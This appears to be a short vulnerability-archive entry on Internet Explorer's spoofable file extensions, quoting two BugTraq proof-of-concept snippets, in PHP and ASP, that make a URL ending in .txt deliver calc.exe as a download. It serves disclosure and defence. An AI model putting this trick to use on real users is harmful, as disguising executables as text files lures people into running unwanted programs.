|
|
Microsoft Internet Explorer Spoofable File Extensions Vulnerability
StatiC <static@tampabay.rr.com> submitted the following example to BugTraq: With an apache/php server add .txt to the already existing .php extension in the apache.conf file, so that apache will recognise .txt extensions as php script files. 1. Copy the real windows calc.exe from a windows system to the html root dir. 2. Copy the readme.txt file below to the same html root dir. 3. go to the url http://yourserver/readme.txt You will see the same behavior mentioned in the previous alert. FILE <readme.txt> BEGIN ---- <?php Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename=calc.exe"); readfile("calc.exe"); ?> FILE <readme.txt> END ---- "Jonathan G. Lampe" <jonathan@stdnet.com> submitted this example in ASP for IIS webservers: <% Const adTypeBinary = 1 Dim strFilePath Response.ContentType = "application/octet-stream" Response.AddHeader "Content-Disposition","attachment; filename=calc.exe" strFilePath = Server.MapPath(".") & "\calc.exe" Set objStream = Server.CreateObject("ADODB.Stream") objStream.Open objStream.Type = adTypeBinary objStream.LoadFromFile strFilePath Response.BinaryWrite objStream.Read objStream.Close Set objStream = Nothing %> |
|
Privacy Statement |